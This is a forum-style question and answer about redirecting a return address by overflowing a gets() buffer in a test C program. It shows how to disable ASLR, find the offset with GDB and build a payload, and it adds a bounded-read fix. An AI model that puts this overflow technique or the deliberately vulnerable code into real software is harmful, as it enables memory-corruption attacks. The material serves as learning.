

ROP failed on Linux even when ASLR and stack compiler protector are disabled

I turned off ASLR and turned off the gcc stack protector.

And I wrote vulnerable C code and tried to overflow the buffer, so I checked how many characters are needed for the crash. And I tried to change the return address to another function, but I got a message:

Segmentation fault (core dumped)

This is my C code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Never called directly: the target for the overwritten return address. */
void sss()
{
  printf("good by");
}

/* Second candidate target, also never called by main(). */
void scriptpy(){
   printf("hello world\n");
}

int main(int argc , char** argv)
{
  char buf[4];
  /* gets() reads until newline with no bound check, so anything past 4 bytes
     overwrites the rest of the stack frame (the deliberate bug of this question). */
  gets(buf);
  return 0;
}

I found the address of the "sss" function and I tried to insert the hex value.

This is my address:

(gdb) disas sss
 Dump of assembler code for function sss:
   0x00000000000006ca <+0>: push   %rbp

To edit the return address I insert:

printf "AAAABBBBB/xe2/x06/x00/x00/x00/x00/x00/x00" | ./cTutorial

Let's suppose that the binary is compiled with the flag -fno-stack-protector and that ASLR is disabled with echo 0 | sudo tee /proc/sys/kernel/randomize_va_space .

Find the crash:

The program starts crashing with a payload of 12 characters:

$ python3 -c "print('A' * 12)" | ./cTutorial
Segmentation fault (core dumped)

Controlling RIP

Using GDB to find the offset that overwrites RIP, we can find that the first byte of RIP can be overwritten with 0x41 ('A') with a payload of 13 characters:

$ gdb -q cTutorial
Reading symbols from cTutorial...
(No debugging symbols found in cTutorial)
(gdb) r <<<$(python3 -c "print('A' * 13)")
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7de0041 in ?? () from /lib/x86_64-linux-gnu/libc.so.6

Note that RIP is overwritten with 0041, where 00 is the null character terminating the string.

To control all bytes of RIP:

(gdb) r <<<$(python3 -c "print('A' * 18)")
Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()

Let's suppose that the function sss is located at the address 0x0000555555555189 .

The final payload is:

(gdb) b sss
(gdb) r <<<$(python3 -c "print('A' * 11 + '\x89\x51\x55\x55\x55\x55')")
breakpoint 1, 0x0000555555555189 in sss ()

Where 11 = 18 - (len('\x89\x51\x55\x55\x55\x55') + 1), the +1 being for the null byte.

The jump to the function sss is taken. The program will crash after the jump to the function sss as the stack will be corrupted.
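As an added example that is neither the asker's program nor the answerer's code: the fix for the crash the answer explains is to stop the read at the buffer boundary. Below, the same 4-byte buffer is read with a bounded fgets()-based reader instead of gets(), and fed the 18-byte line of 'A's from the answer (constructed here as a string and written to a temporary file, since tmpfile() is standard C). A guard value placed after the buffer shows that the bytes beyond it are no longer touched, and the remainder of the over-long line is drained so it cannot leak into the next read. The function names read_line_bounded, stream_from_string and demo_bounded_read are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* Bounded replacement for gets(): stores at most dst_size-1 bytes in dst,
   always NUL-terminates, strips the trailing newline like gets() did, and
   drains the rest of an over-long line so it does not spill into the next
   read. Returns the number of bytes stored, or -1 on EOF with nothing read.
   *truncated is set to 1 when input had to be discarded. (Lines containing an
   embedded NUL are not handled; strlen() would stop early.) */
int read_line_bounded(char *dst, size_t dst_size, FILE *in, int *truncated)
{
    *truncated = 0;
    if (dst_size == 0)
        return -1;
    if (fgets(dst, (int)dst_size, in) == NULL) {
        dst[0] = '\0';
        return -1;
    }
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[--len] = '\0';
    } else {
        /* No newline in what we kept: the line was longer than the buffer
           (or ended at EOF). Consume the rest of it without storing it. */
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            *truncated = 1;
    }
    return (int)len;
}

/* Turns a constructed input string into a FILE* so the reader can be
   exercised offline exactly as it would be on stdin. */
FILE *stream_from_string(const char *s)
{
    FILE *f = tmpfile();
    if (f == NULL)
        return NULL;
    fputs(s, f);
    rewind(f);
    return f;
}

/* Mirrors the asker's main(): a 4-byte buffer, but read with the bounded
   reader. A guard word follows the buffer in the struct; with gets() the
   18-byte line would have overwritten it. Returns 1 when the buffer holds
   the first 3 bytes plus NUL, the input was reported as truncated, and the
   guard is intact. */
int demo_bounded_read(const char *input)
{
    struct { char buf[4]; unsigned long guard; } frame;
    const unsigned long magic = 0xdeadbeefcafef00dUL;
    int truncated = 0;

    memset(&frame, 0, sizeof frame);
    frame.guard = magic;

    FILE *in = stream_from_string(input);
    if (in == NULL)
        return 0;
    int n = read_line_bounded(frame.buf, sizeof frame.buf, in, &truncated);
    fclose(in);

    return n == 3 && truncated == 1 && frame.buf[3] == '\0'
        && strcmp(frame.buf, "AAA") == 0 && frame.guard == magic;
}

int main(void)
{
    /* The 18-character payload from the answer, constructed inline. */
    const char *payload = "AAAAAAAAAAAAAAAAAA\n";
    printf("bounded read keeps the frame intact: %s\n",
           demo_bounded_read(payload) ? "yes" : "no");
    return 0;
}
```

The behaviour to note is in the else branch of read_line_bounded: a bounded read that does not drain the remainder of the line leaves the surplus 'A's queued on the stream, so a later read would receive data the user never meant for it. Draining (and reporting truncation) keeps the parser's view of the input aligned with line boundaries.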
